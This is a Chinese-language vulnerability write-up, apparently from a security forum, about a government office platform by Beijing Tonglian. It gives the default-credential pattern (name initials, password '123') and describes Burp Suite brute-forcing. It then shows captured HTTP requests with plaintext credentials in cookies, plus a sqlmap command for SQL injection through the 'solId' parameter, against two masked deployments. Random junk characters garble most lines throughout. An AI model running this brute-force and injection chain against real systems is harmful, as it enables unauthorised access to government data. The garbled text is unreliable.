1 J C# t8 q. w( c+ M; w3 m
1 a' W$ `" H+ s" U' @. v
6 _2 S7 t u" h5 U
( N+ S, \, p$ h4 _ 平台简介:
$ J( I* i% v/ X0 V- f1 p8 i
7 I. d Z; x5 _
1 y. d- F- V! \; ]# k
" e: H& X0 l; ~ J
/ x, H6 I5 j7 j: {2 ? e; h7 b( E/ m5 C* j
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 Y3 U" n# g, ?0 {/ U# `; F同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 ! l& w! ?; B3 k) R# W
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!) m. l! J8 d9 D1 x/ A
: I \9 b5 w1 n2 _
' ?# W* S- n1 k1 b7 R
$ v" _+ b( J e* x. a
' ^" U# F% m$ w
. x% @2 d! ?1 P5 ^# o3 K/ i, Q* K 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:5 k( ^; ?0 v9 ~. F1 y: z
3 x! t: v2 A2 k
. H7 l+ S/ v. K$ Q6 g9 g. C: S. v; B2 l
& [! h, n. ]" `( r) S
- J5 H( Q" Z2 L- \& O8 _- G2 e- `: n& x; Q6 [
http://1.1.1.1:7197/cap-aco/#(案例2-)
6 m, ]2 X' S0 v2 [
2 N* L0 z- I- ]: i" b9 [8 c$ `1 n8 y0 `* p( E, X" L( @: J7 J
http://www.XXOO.com (案例1-官网网站)& ^( p2 T6 @7 ^- g! f/ P
% \* l( b# S" x
$ S' w& F& P1 A& o$ k& p* _+ [ 5 |2 g1 }3 }! E4 j, D c9 Y+ l
& v& C1 k D/ _. Z6 D% t$ @
% I8 }+ X& ?: b) Q 漏洞详情:
. z2 u0 R6 [. O1 A1 k1 r8 q & @+ d3 }3 O" ^7 l; p# c: j
9 H6 P4 l4 G. t; {4 G 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 V. g- X) t' [0 R* d2 M1 n
/ j) F1 i$ y3 m3 n
" H9 N2 r8 e5 U5 z" O 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
) K! S; @& G- k5 @+ H) [0 k8 U) J
% \& B. ~+ I/ F2 X% y3 y H4 a5 H
0 `9 |9 W$ S3 W2 Z3 B2 u2 b
! ~7 M* B$ x8 Q" f6 m 0 X& U$ F7 d% E' x4 W) v t8 P
( E/ G7 [! I5 o7 A 9 O0 k& A2 n, O* Q
3 c0 T3 I% e- t i3 q; _9 l
7 N; ?& g* N% { status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:+ q9 T& D; @+ |7 }/ a
4 o& b0 v4 y& G7 j' `; @8 i6 K( p. k3 t# D& h2 l" a9 e
1、案例1-官方网站! P/ f6 F3 ?6 ], M
& |7 W* |/ p9 n2 i; E; R* q1 X4 U/ t$ {; V- f# ~! v3 F
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 z& u: x/ Z5 L4 ~: @( F
5 R0 c0 s+ n/ ^$ F5 N0 F! Q
3 M' t# B2 d( Q% I* w$ M$ f6 f/ r" n Host: www.XXOO.com
" E4 [' T5 y) p/ q
6 ]1 C' R* [) X$ i) e( L4 g8 o9 l c9 g3 G3 ?
Proxy-Connection: Keep-Alive7 W: { m/ e4 U: |1 D1 C( b
: z! D/ O. S/ {5 _; B
% y$ Z& h( x* k4 b `+ H. C; s Accept: application/json, text/javascript, */*; q=0.010 n8 z0 ~: [3 W! T7 e& _
9 P6 ]0 K6 L4 ]7 @
! d0 m) i9 q) u6 F7 c8 s4 _( l Accept-Language: zh-CN0 f0 |1 ^2 C5 y. R Z0 X
" h5 J" b; m* M8 S: ~3 G& O8 R( C/ |$ ?9 L4 p3 J
Content-Type: application/json
4 M! v% o- h- Z
. X9 K& T S: K2 n5 g/ m( w
* f! ~- a$ `. V: W- w User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko; `) K, v5 T x. j& e7 h
8 _% q4 P, S9 D4 l4 x h/ @# l; a% |2 V4 }7 f+ g# i! i: w ~3 z
X-Requested-With: XMLHttpRequest
( Y# K3 i! u* R/ Y$ z L
) k0 m0 C" ~# {+ k# F" H. V
( ]8 ^& U& C8 V4 S8 K9 O2 ? Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
" B1 f% L% K# s6 h" {7 ?) }
1 N6 w' Y& j1 p5 L0 ]( M% v/ P3 q0 [# G
Accept-Encoding: gzip, deflate, sdch
' Y6 ~2 n2 w. B9 e
! @ ~' m3 f: a8 G2 `' k/ d0 m4 F, ~3 g% [5 X( V
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
" k* m5 t8 a8 W6 c% z 7 W- n; X3 u4 @6 W- Q
* n& g2 R6 e. a1 C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 L, `+ l2 B- B
) z" Q& F3 C( e m. ^2 i7 q, q. s1 v
/ W3 _1 \: H5 |3 b
& n( e3 g" A, k( q" j3 q 3 S5 Z" W; B0 C, V# w4 i
B/ ?/ V0 j9 ^% ~, A: k - ?6 n) n$ u( j1 I. y
1 @* V/ U8 } e8 U2 t7 w- y% Y0 a
7 P3 M7 c& h; z) z / u J j; E9 C1 W( S5 `" x
0 a: ]4 \: j1 x: X. a, q" a # b1 I R- }, j8 y5 l
6 c K2 t! i2 X. q w3 F7 _, n1 k. D$ X; t# ?
( }& o, S. p; J" x 5 y7 j7 }7 @1 {% W6 s* P# J6 n& T2 p
4 n8 H3 \" G' L8 y; [+ r
2、案例2-某天河云平台
: x. D! {# k* l5 E/ M! t / G$ q, C& l% u2 s! q4 j# j( i5 f$ h8 {
; M' T6 g. @. w+ K
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
2 t0 \! y! B: V. ]# O( Q 1 g+ S- o5 C% e8 `/ m9 X% }
7 K# ~# ?$ ?$ t4 \0 ?, j* v4 p
Host: 1.1.1.:71977 `3 Y; [5 y5 {! g
) h5 P) F ?$ a# e& \
9 P& y, L1 A3 y9 z: R( d Accept: application/json, text/javascript, */*; q=0.01
3 T: W* m6 o n: L# k, h
3 d [; f6 V4 F; S) d5 A
9 [" B# x; i/ \" X0 D% o, \ X-Requested-With: XMLHttpRequest
# m8 {2 E# c2 G; P7 L, h6 A& u! w * M7 Q# U1 m- {0 t+ Q
. u+ t% U, e, Y, ~0 S- R; a E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
2 ?! N, y% G7 {& R: h/ U# { ( e9 `! B D# k% b! j
" n2 k- r+ f5 v) k
Content-Type: application/json
: ]$ A* s9 j; `) i0 Z 2 ~$ ]% V% t' {. O* c
8 W$ a* [9 }8 l
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
" J/ N( m+ _& E5 k5 Y / }' b* o5 i+ i, v2 t
9 O, j, p2 o" Q7 k
Accept-Language: zh-CN,zh;q=0.8
2 P, }" _# c) M( }1 Y
5 f) m+ k$ U8 ^$ d& Y# W& W6 t! b/ R: {4 U
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=19 g$ z! n" {9 z; }
S' f$ D4 c' p: V8 ]4 P1 @4 F* h/ h5 `+ h) D
Connection: close: A4 A3 D7 N/ P/ }2 G" @
+ h( s1 j& U6 E: | Q
" x2 d6 d9 k+ {3 h5 L
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:9 R8 _1 F! ~' s @
) i3 f) v( D: ?4 H* p+ Q5 w
4 D; p8 ]# O7 \9 _9 [: a# ]
, O" C2 s9 L, l3 G' {& j
' G+ }3 V( \( q# k
* Q; w R: [- r% P5 e
3 K: z$ ~# _6 i! a6 K+ J |